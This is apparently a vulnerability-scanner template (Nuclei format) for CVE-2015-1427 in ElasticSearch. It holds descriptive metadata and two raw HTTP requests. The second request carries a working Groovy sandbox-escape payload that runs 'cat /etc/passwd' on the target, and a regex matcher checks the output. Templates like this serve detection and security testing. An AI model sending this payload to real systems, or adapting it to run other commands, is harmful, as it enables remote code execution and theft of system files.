id: CVE-2015-1427 info: name: ElasticSearch - Remote Code Execution author: pikpikcu severity: critical description: ElasticSearch before 1.3.8 and 1.4.x before 1.4.3 allows remote attackers to bypass the sandbox protection mechanism and execute arbitrary shell commands via a crafted script to the Groovy scripting engine. reference: - https://blog.csdn.net/JiangBuLiu/article/details/94457980 - http://www.elasticsearch.com/blog/elasticsearch-1-4-3-1-3-8-released/ - https://nvd.nist.gov/vuln/detail/CVE-2015-1427 - http://web.archive.org/web/20210506011817/https://www.securityfocus.com/bid/72585 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H cvss-score: 10.0 cwe-id: CWE-77 cve-id: CVE-2015-1427 tags: cve,cve2015,elastic,rce,elasticsearch,kev metadata: max-request: 2 http: - raw: - | POST /website/blog/ HTTP/1.1 Host: {{Hostname}} Accept: */* Accept-Language: en Content-Type: application/x-www-form-urlencoded { "name": "test" } - | POST /_search HTTP/1.1 Host: {{Hostname}} Accept: */* Content-Type: application/x-www-form-urlencoded {"size":1, "script_fields": {"lupin":{"lang":"groovy","script": "java.lang.Math.class.forName(\"java.lang.Runtime\").getRuntime().exec(\"cat /etc/passwd\").getText()"}}} matchers-condition: and matchers: - type: word words: - "application/json" part: header - type: regex regex: - "root:.*:0:0:" part: body - type: status status: - 200 # Enhanced by mp on 2022/05/11